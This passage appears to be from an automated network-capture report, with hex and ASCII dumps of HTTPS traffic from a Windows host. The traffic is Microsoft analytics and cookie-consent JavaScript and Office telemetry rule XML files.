                                                                                                                                                                        Data Ascii: o track page visit time failed, metric will not be collected: "+ce(r))}},Y(e,"_logger",{g:function(){return o}}),Y(e,"pageVisitTimeTrackingHandler",{g:function(){return c}})})}var Nd=function(e,t){this[gd]=Pt(),this.pageName=e,this.pageUrl=t},Dd=function(
                                                                                                                                                                        2024-11-24 04:12:06 UTC16384INData Raw: 63 6f 72 65 44 61 74 61 2c 22 62 65 68 61 76 69 6f 72 22 29 2c 75 65 28 6e 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 6e 2e 70 61 67 65 54 79 70 65 29 2c 75 65 28 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 26 26 21 75 65 28 65 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 2c 75 65 28 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 26 26 28 65 2e 6d 61 72 6b 65 74 3d 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 2c 65 2e 69 73 4c 6f 67 67 65 64 49 6e 3d 47 64 28 72 2e 5f 63 6f 6e 66 69 67 29 2c 74 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 3d 6f 63 28 29 7d 2c 69 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 73 65 74 50 61 67 65 54
                                                                                                                                                                        Data Ascii: coreData,"behavior"),ue(n.pageType)&&(e.pageType=n.pageType),ue(r._pageTypeMetaTag)&&!ue(e.pageType)&&(e.pageType=r._pageTypeMetaTag),ue(r._marketMetaTag)&&(e.market=r._marketMetaTag),e.isLoggedIn=Gd(r._config),t.cookieEnabled=oc()},ip.prototype._setPageT
                                                                                                                                                                        2024-11-24 04:12:06 UTC16384INData Raw: 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 57 69 74 68 44 61 74 61 42 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 7e 74 5b 6e 5d 2e 6e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 64 61 74 61 2d 62 69 2d 22 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 22 64 61 74 61 2d 6d 22 3d 3d 3d 74 5b 6e 5d 2e 6e 61 6d
                                                                                                                                                                        Data Ascii: n!0;return!1},Ap.prototype._isTrackedWithDataBi=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if(~t[n].name.indexOf("data-bi-"))return!0;return!1},Ap.prototype._isTracked=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if("data-m"===t[n].nam
                                                                                                                                                                        2024-11-24 04:12:06 UTC16384INData Raw: 75 74 68 54 6f 6b 65 6e 22 2c 61 3d 22 41 75 74 68 58 54 6f 6b 65 6e 22 2c 67 67 3d 22 6d 73 66 70 63 22 2c 76 67 3d 22 75 73 65 72 22 2c 68 67 3d 22 61 6c 6c 6f 77 52 65 71 75 65 73 74 53 65 6e 64 69 6e 67 22 2c 6d 67 3d 22 66 69 72 73 74 52 65 71 75 65 73 74 53 65 6e 74 22 2c 79 67 3d 22 73 68 6f 75 6c 64 41 64 64 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 73 22 2c 43 67 3d 22 67 65 74 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 56 61 6c 75 65 22 2c 62 67 3d 22 73 65 74 43 6c 6f 63 6b 53 6b 65 77 22 2c 79 65 3d 22 6c 65 6e 67 74 68 22 2c 54 67 3d 22 63 6f 6e 63 61 74 22 2c 49 67 3d 22 69 4b 65 79 22 2c 45 67 3d 22 63 6f 75 6e 74 22 2c 5f 67 3d 22 65 76 65 6e 74 73 22 2c 53 67 3d 22 70 75 73 68 22 2c 78 67 3d 22 73 70 6c 69 74 22 2c 4e 67 3d 22 73 70
                                                                                                                                                                        Data Ascii: uthToken",a="AuthXToken",gg="msfpc",vg="user",hg="allowRequestSending",mg="firstRequestSent",yg="shouldAddClockSkewHeaders",Cg="getClockSkewHeaderValue",bg="setClockSkew",ye="length",Tg="concat",Ig="iKey",Eg="count",_g="events",Sg="push",xg="split",Ng="sp
                                                                                                                                                                        2024-11-24 04:12:06 UTC16384INData Raw: 29 29 2c 65 5b 6c 76 5d 26 26 28 65 5b 6c 76 5d 3d 65 61 28 65 5b 6c 76 5d 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 65 5b 79 76 5d 7c 7c 28 65 5b 79 76 5d 3d 30 29 2c 65 5b 43 76 5d 7c 7c 28 65 5b 43 76 5d 3d 31 29 2c 6c 28 65 29 2c 65 5b 62 76 5d 29 69 66 28 55 7c 7c 61 65 29 65 5b 43 76 5d 3d 33 2c 65 5b 62 76 5d 3d 21 31 3b 65 6c 73 65 20 69 66 28 48 29 72 65 74 75 72 6e 20 57 26 26 28 65 3d 65 61 28 65 29 29 2c 48 5b 72 76 5d 28 45 76 2e 63 72 65 61 74 65 28 65 5b 49 67 5d 2c 5b 65 5d 29 2c 21 30 3d 3d 3d 65 5b 62 76 5d 3f 31 3a 65 5b 62 76 5d 2c 33 29 3b 76 61 72 20 6e 3d 65 5b 43 76 5d 2c 72 3d 63 65 2c 69 3d 52 2c 61 3d 28 34 3d 3d 3d 6e 26 26 28 72 3d 6f 65 2c 69 3d 4f 29 2c 21 31 29 3b 72 3c 69 3f 61 3d 21 43 28 65 2c
                                                                                                                                                                        Data Ascii: )),e[lv]&&(e[lv]=ea(e[lv])))}function a(e,t){if(e[yv]||(e[yv]=0),e[Cv]||(e[Cv]=1),l(e),e[bv])if(U||ae)e[Cv]=3,e[bv]=!1;else if(H)return W&&(e=ea(e)),H[rv](Ev.create(e[Ig],[e]),!0===e[bv]?1:e[bv],3);var n=e[Cv],r=ce,i=R,a=(4===n&&(r=oe,i=O),!1);r<i?a=!C(e,


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        111192.168.2.74983913.107.246.634436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:05 UTC373OUTGET /mscc/lib/v2/wcp-consent.js HTTP/1.1
                                                                                                                                                                        Host: wcpstatic.microsoft.com
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                        Accept: */*
                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                        2024-11-24 04:12:06 UTC713INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:05 GMT
                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                        Content-Length: 52717
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                        Age: 32791
                                                                                                                                                                        Cache-Control: max-age=43200
                                                                                                                                                                        Content-MD5: QT/MdZzBmCG2G2lBgIsptQ==
                                                                                                                                                                        Etag: 0x8DA85F6F74C6D08
                                                                                                                                                                        Last-Modified: Wed, 24 Aug 2022 17:34:58 GMT
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        X-Cache: CONFIG_NOCACHE
                                                                                                                                                                        x-ms-blob-type: BlockBlob
                                                                                                                                                                        x-ms-lease-status: unlocked
                                                                                                                                                                        x-ms-request-id: ae9d672f-401e-00c3-76da-3dd985000000
                                                                                                                                                                        x-ms-version: 2009-09-19
                                                                                                                                                                        x-azure-ref: 20241124T041205Z-178bfbc474bwh9gmhC1NYCy3rs00000005cg00000000q7xm
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:06 UTC15671INData Raw: 76 61 72 20 57 63 70 43 6f 6e 73 65 6e 74 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 32 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2c 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 69 66 28 74 5b 6e 5d 29 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 74 5b 6e 5d 3d 7b 69 3a 6e 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 6f 29 2c 72 2e 6c 3d 21 30 2c 72 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6f 2e 6d 3d 65 2c 6f 2e 63 3d 74 2c 6f 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                        Data Ascii: var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e
                                                                                                                                                                        2024-11-24 04:12:06 UTC16384INData Raw: 29 7b 72 65 74 75 72 6e 20 65 3f 65 2e 72 65 70 6c 61 63 65 28 2f 26 2f 67 2c 22 26 61 6d 70 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3c 2f 67 2c 22 26 6c 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3e 2f 67 2c 22 26 67 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 26 71 75 6f 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 27 2f 67 2c 22 26 23 30 33 39 3b 22 29 3a 22 22 7d 2c 65 7d 28 29 2c 61 3d 6e 2e 6c 6f 63 61 6c 73 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 2c 6f 2c 6e 2c 72 2c 69 2c 61 29 7b 74 68 69 73 2e 64 69 72 65 63 74 69 6f 6e 3d 22 6c 74 72 22 2c 74 68 69 73 2e 70 72 65 76 69 6f 75 73 46 6f 63 75 73 45 6c 65 6d 65 6e 74 42 65 66 6f 72 65 50 6f 70 75 70 3d 6e 75 6c 6c 2c 74 68 69 73 2e 63 6f 6f 6b 69
                                                                                                                                                                        Data Ascii: ){return e?e.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;").replace(/"/g,"&quot;").replace(/'/g,"&#039;"):""},e}(),a=n.locals,l=function(){function e(e,t,o,n,r,i,a){this.direction="ltr",this.previousFocusElementBeforePopup=null,this.cooki
                                                                                                                                                                        2024-11-24 04:12:06 UTC16384INData Raw: 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c 61 62 65 6c 3a 68 6f 76 65 72 3a 3a 61 66 74 65 72 20 7b 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 68 6f 76 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c
                                                                                                                                                                        Data Ascii: or"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + label:hover::after {\n background-color: "+e["radio-button-hover-background-color"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + l
                                                                                                                                                                        2024-11-24 04:12:06 UTC4278INData Raw: 65 6d 65 6e 74 42 79 49 64 28 22 77 63 70 43 6f 6e 73 65 6e 74 42 61 6e 6e 65 72 43 74 72 6c 22 29 7d 2c 65 2e 65 6d 69 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 5b 5d 2c 6f 3d 31 3b 6f 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 74 5b 6f 2d 31 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 6f 5d 3b 76 61 72 20 6e 3d 74 68 69 73 2e 65 76 65 6e 74 73 5b 65 5d 3b 6e 26 26 6e 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 74 29 7d 29 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 65 2e 61 64 64 45 76 65 6e 74
                                                                                                                                                                        Data Ascii: ementById("wcpConsentBannerCtrl")},e.emit=function(e){for(var t=[],o=1;o<arguments.length;o++)t[o-1]=arguments[o];var n=this.events[e];n&&n.forEach((function(e){e.apply(null,t)}))},e.prototype.addEventListener=function(e,t,o){e.addEventListener?e.addEvent


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        112192.168.2.74984113.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:06 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:07 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:07 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1397
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                                                                                        ETag: "0x8DC582BE7262739"
                                                                                                                                                                        x-ms-request-id: d8182971-801e-0067-2581-3bfe30000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041207Z-174c587ffdf8fcgwhC1TEBnn70000000040000000000me9k
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:07 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        113192.168.2.74984213.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:07 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:07 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:07 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1360
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                        ETag: "0x8DC582BDDEB5124"
                                                                                                                                                                        x-ms-request-id: bac6914c-b01e-0002-4559-3c1b8f000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041207Z-15b8b599d88wk8w4hC1TEB14b800000003ug00000000mczd
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:07 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        114192.168.2.74984313.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:07 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:07 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:07 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1403
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                        ETag: "0x8DC582BDCB4853F"
                                                                                                                                                                        x-ms-request-id: eb1e057a-b01e-0097-688c-3a4f33000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041207Z-178bfbc474bscnbchC1NYCe7eg00000005kg00000000acus
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:07 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        115192.168.2.74984413.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:07 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:07 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:07 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1366
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                        ETag: "0x8DC582BDB779FC3"
                                                                                                                                                                        x-ms-request-id: 40694bf4-501e-008c-7530-3ccd39000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041207Z-178bfbc474bw8bwphC1NYC38b4000000055g00000000k56w
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:07 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        116192.168.2.74984513.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:07 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:07 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:07 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1397
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                        ETag: "0x8DC582BDFD43C07"
                                                                                                                                                                        x-ms-request-id: af8656a8-801e-00a0-672a-3c2196000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041207Z-178bfbc474bpscmfhC1NYCfc2c000000041000000000aah2
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
